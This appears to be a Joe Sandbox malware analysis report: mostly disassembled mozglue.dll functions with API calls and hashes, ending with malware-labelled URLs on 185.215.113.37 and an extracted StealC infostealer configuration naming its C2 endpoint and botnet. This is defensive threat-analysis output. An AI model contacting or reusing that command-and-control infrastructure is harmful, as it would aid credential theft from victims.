Part of subcall function 6C60CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C61CEEA,?,?,?,?,00000000,?,6C60DA31,00100000,?,?,00000000), ref: 6C60CB57
Part of subcall function 6C60CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C60CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C61CEEA,?,?), ref: 6C60CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C60DA31,00100000,?,?,00000000,?), ref: 6C61D058

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 657331c1bb5d4c96020b099fffa0092fa3d99092ded94466410dac6faff41b6a
Instruction ID: d80fcc365c1ba98f772422399f93836158686ff28716976de8afae3955d63236
Opcode Fuzzy Hash: 657331c1bb5d4c96020b099fffa0092fa3d99092ded94466410dac6faff41b6a
Instruction Fuzzy Hash: 70D17F71A04B469FD708CF2CC480B99F7E1BF89308F01866DD9598BB52EB31A965CB85

Function 6C5E5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C5E5D40
EnterCriticalSection.KERNEL32(6C64F688), ref: 6C5E5D67
__aulldiv.LIBCMT ref: 6C5E5DB4
LeaveCriticalSection.KERNEL32(6C64F688), ref: 6C5E5DED

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 7f2f4d28962412b866b0ed3cac56c1c8e6c72e3df647e29db09f419915323cc6
Instruction ID: e798aa0b1d1cc4aaac8381d7626a75b45f92e064b6acd14cbab22a46268d1013
Opcode Fuzzy Hash: 7f2f4d28962412b866b0ed3cac56c1c8e6c72e3df647e29db09f419915323cc6
Instruction Fuzzy Hash: 6E518071E001298FCF08DFA9C994AAEBBB1FB89308F59C62DD815A7750C7306945CB95

Function 6C5CCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C5CCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C5CCF4E

Strings

0, xrefs: 6C5CCF30

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 8eaa7c09c2f19b875529ebdf24eecc2189fd492caa15c4d075fdd62bc090fab4
Instruction ID: 22a27507fec910c1a6d49a513fbdd1f1d620b95f68c61cc3e39c63bc10340ae3
Opcode Fuzzy Hash: 8eaa7c09c2f19b875529ebdf24eecc2189fd492caa15c4d075fdd62bc090fab4
Instruction Fuzzy Hash: FC51F275A0022A8FCB01CF18C890A9ABBA5EF9A304F19869DD8595F351D731BD06CBE0

Function 6C606470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6082BC,?,?), ref: 6C60649B

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6064A9

Part of subcall function 6C5FFA80: GetCurrentThreadId.KERNEL32 ref: 6C5FFA8D
Part of subcall function 6C5FFA80: AcquireSRWLockExclusive.KERNEL32(6C64F448), ref: 6C5FFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60653F
free.MOZGLUE(?), ref: 6C60655A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 1af89d0012ca881ae2a36a6b58cb315bb2556661be241c6087987fc18ac5d8a4
Instruction ID: f28aa407fd5ad1930689a588ff87d5370f63486f8983b03e8f4b04452c2a1b42
Opcode Fuzzy Hash: 1af89d0012ca881ae2a36a6b58cb315bb2556661be241c6087987fc18ac5d8a4
Instruction Fuzzy Hash: C03181B5A043159FC704DF14D884A9FB7E4FF89314F40842DE85A97740E730E919CB96

Function 6C5DB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5DB4F5
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C5DB502
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C5DB542
free.MOZGLUE(?), ref: 6C5DB578

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 663b264807e928bc78a15aa7bca438ac10b12b398153e2a8aa50efffe02512ff
Instruction ID: 0aa01543cd5efc1e115fda6f95956db6f609de16d4790774c1994b4cb2cc4016
Opcode Fuzzy Hash: 663b264807e928bc78a15aa7bca438ac10b12b398153e2a8aa50efffe02512ff
Instruction Fuzzy Hash: 3D11CD31A14B41C7D712EF2AD840765B3B2FFDA318F11D70AE84952A02FBB0B5C58B99

Function 6C603DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C5CF20E,?), ref: 6C603DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C5CF20E,00000000,?), ref: 6C603DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C603E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C603E0E

Part of subcall function 6C5FCC00: GetCurrentProcess.KERNEL32(?,?,6C5C31A7), ref: 6C5FCC0D
Part of subcall function 6C5FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5C31A7), ref: 6C5FCC16

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: f2804b951b52d5bc855f19593ebced857496a527078e6690fb65cb622075ccb3
Instruction ID: 4740c3378b6dd68675c4aef7233efa983c337e17cb84dfd1064d8a43042d9b81
Opcode Fuzzy Hash: f2804b951b52d5bc855f19593ebced857496a527078e6690fb65cb622075ccb3
Instruction Fuzzy Hash: 3DF05E716002087FD704AB55DC81DAB376DEB86628F048020FD0957701D635BD198AFB

Function 6C6185B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6185D3

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C618725

Strings

map/set<T> too long, xrefs: 6C618720

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: a0e3de2414cde47121e6d3f7504a865157888344cb2cb7a2c3544fc6b5b9375d
Instruction ID: a0baa3fcdc46bddea52448459bcd98eb0b218aa1f5f4df3d8a63a2fcc6d492dc
Opcode Fuzzy Hash: a0e3de2414cde47121e6d3f7504a865157888344cb2cb7a2c3544fc6b5b9375d
Instruction Fuzzy Hash: 96516774A08651CFD701CF18C084A59BBF1BF4A318F1AC28AD8595BB62C335EC45CF95

Function 6C5CBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C5CBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5CBE8F

Strings

0, xrefs: 6C5CBE5B

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: e49acf1c8e84bd55c3b8943ab8d07189f0a0e97bd37a8eb118090e7ceebea59e
Instruction ID: 6ca0be9ac8a86ac7e9436708ac653e1647efd08ebf6ed052f7376eb365350f6f
Opcode Fuzzy Hash: e49acf1c8e84bd55c3b8943ab8d07189f0a0e97bd37a8eb118090e7ceebea59e
Instruction Fuzzy Hash: 9B41C271A09745CFC701EFB8C881A9BB7F4AF8A748F008A1DF995A7611D730D9498B83

Function 6C603CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C603D19
mozalloc_abort.MOZGLUE(?), ref: 6C603D6C

Strings

d, xrefs: 6C603D58

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: f0aeacc84427a499ad1c9697bf62ccdbf59065f5821f7a1b6d64cafb1501e308
Instruction ID: ea224d0d47a03b3e3ecc10e0dc7ee2d9f7926f2adc587a984dd2c89338b3450c
Opcode Fuzzy Hash: f0aeacc84427a499ad1c9697bf62ccdbf59065f5821f7a1b6d64cafb1501e308
Instruction Fuzzy Hash: D4110431F04688DBDB08DF6AC9548EDB7B5EF86319F44D228DC49A7642FB30A584C358

Function 6C626DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C626E22
__Init_thread_footer.LIBCMT ref: 6C626E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C626E1D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 79d64a5e9bfd5acee9acfad0be82f1304c87009e756342bde1323c912f446a4a
Instruction ID: 436df16fc93eed1978f03a02baf249ac13a0d6d53f1754ae5f7f036f8d3690fe
Opcode Fuzzy Hash: 79d64a5e9bfd5acee9acfad0be82f1304c87009e756342bde1323c912f446a4a
Instruction Fuzzy Hash: 91F05935208280CBDB00ABA9C890AD37372935331CF04C165C89146F61DB25E917CF9F

Function 6C5D9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C5D9EEF

Strings

Infinity, xrefs: 6C5D9EB7
NaN, xrefs: 6C5D9EC1

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 7638be8854211ff36af2fca61fdd7afabe71bf2c8a7e65ffca6139aa7fccbf88
Instruction ID: b87adabb5527f88371bec6faa38c32740d831b30bc90e94744d8955880322905
Opcode Fuzzy Hash: 7638be8854211ff36af2fca61fdd7afabe71bf2c8a7e65ffca6139aa7fccbf88
Instruction Fuzzy Hash: 06F0A971600342CADB00EF5AEE95B823BF1A34330DF20CA58C5040AF80DB356546CA8F

Function 6C5D6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0K`l,?,6C604B30,80000000,?,6C604AB7,?,6C5C43CF,?,6C5C42D2), ref: 6C5D6C42

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

moz_xmalloc.MOZGLUE(0K`l,?,6C604B30,80000000,?,6C604AB7,?,6C5C43CF,?,6C5C42D2), ref: 6C5D6C58

Strings

0K`l, xrefs: 6C5D6C33, 6C5D6C41, 6C5D6C57

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0K`l
API String ID: 1967447596-2354643784
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: eadacf5e47c3d45c033a75d1978b4625e691ca2ddcea51c646d783483cb848f6
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 60E026F1A113004ADB08D8BCAC0952A72C8CB342A87054E35E822C2BE8FF14F8418059

Function 6C5DBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C5DBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C5DBEF5

Strings

cryptbase.dll, xrefs: 6C5DBEF0

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 3f3255c0e0deb35eb43dc52f9ef95b7b9238d1f1e77b5e26c913fbdadb143825
Instruction ID: ce59b318a09f592b6cce7fa04dc43daebb86a0977407c41d6a41245a8eb4112f
Opcode Fuzzy Hash: 3f3255c0e0deb35eb43dc52f9ef95b7b9238d1f1e77b5e26c913fbdadb143825
Instruction Fuzzy Hash: 0AD0A731184708E6C700BA55CC06F293775D741359F10C020F30544951C7B1A412CF4C

Function 6C61B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C61B2C9,?,?,?,6C61B127,?,?,?,?,?,?,?,?,?,6C61AE52), ref: 6C61B628

Part of subcall function 6C6190E0: free.MOZGLUE(?,00000000,?,?,6C61DEDB), ref: 6C6190FF
Part of subcall function 6C6190E0: free.MOZGLUE(?,00000000,?,?,6C61DEDB), ref: 6C619108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C61B2C9,?,?,?,6C61B127,?,?,?,?,?,?,?,?,?,6C61AE52), ref: 6C61B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C61B2C9,?,?,?,6C61B127,?,?,?,?,?,?,?,?,?,6C61AE52), ref: 6C61B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C61B127,?,?,?,?,?,?,?,?), ref: 6C61B74D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: d2ba243b04c091532758b14435429ab57442d975f8d413df6fbc1fe274fb2ae7
Instruction ID: 8b43c90181251cd90142f7e1b964ab0568fd3cc4649651b4d627e6c8b5eb0250
Opcode Fuzzy Hash: d2ba243b04c091532758b14435429ab57442d975f8d413df6fbc1fe274fb2ae7
Instruction Fuzzy Hash: 0C51C2B1A092158FDB14CF1DC98075EB7B5FFC530AF55852DC85AABB10D731A804CBA9

Function 6C616E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C616EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C616EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C616F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616F5C

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 05b0e0321913991a1bab4d1f05a50033b2c053b488cd1cd9b2a59464317ced2c
Instruction ID: cb8e688bf0530f41179b3e5302e80977f8b832a371a3c683597512b3cb31d510
Opcode Fuzzy Hash: 05b0e0321913991a1bab4d1f05a50033b2c053b488cd1cd9b2a59464317ced2c
Instruction Fuzzy Hash: E631E775A1460A8FDB04CF2CC9806AA73FAEBC5305F508239D41AC7A61EB32E559C794

Function 6C62B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C5D0A4D), ref: 6C62B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C5D0A4D), ref: 6C62B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C5D0A4D), ref: 6C62B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C5D0A4D), ref: 6C62B67F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: f3d7c58e471242c666c5c08b4178332ab6f3f2aca3fa0d09ac3d3d8d66207805
Instruction ID: 85bbc86e3b5f95028a02f458fe7350430bcd0e441053deb681199ee5ac8987b6
Opcode Fuzzy Hash: f3d7c58e471242c666c5c08b4178332ab6f3f2aca3fa0d09ac3d3d8d66207805
Instruction Fuzzy Hash: 4E31F471A002168FDB10DF59C884A9ABBB5FFC0309F16C529C8179B301DB36E915CFA4

Function 6C5FF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C5FF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C5FF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C5FF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C5FF668

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: e41db38e3f6f875d9ae13fc1318721d7dfe5004b6dac3c74e46dbe65df8249b3
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: C3315071A00224AFD718DF29CCC0A9E77F5EB84358B148638FA5A8BF05D632E945CB94

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware

Source: 0.2.file.exe.970000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
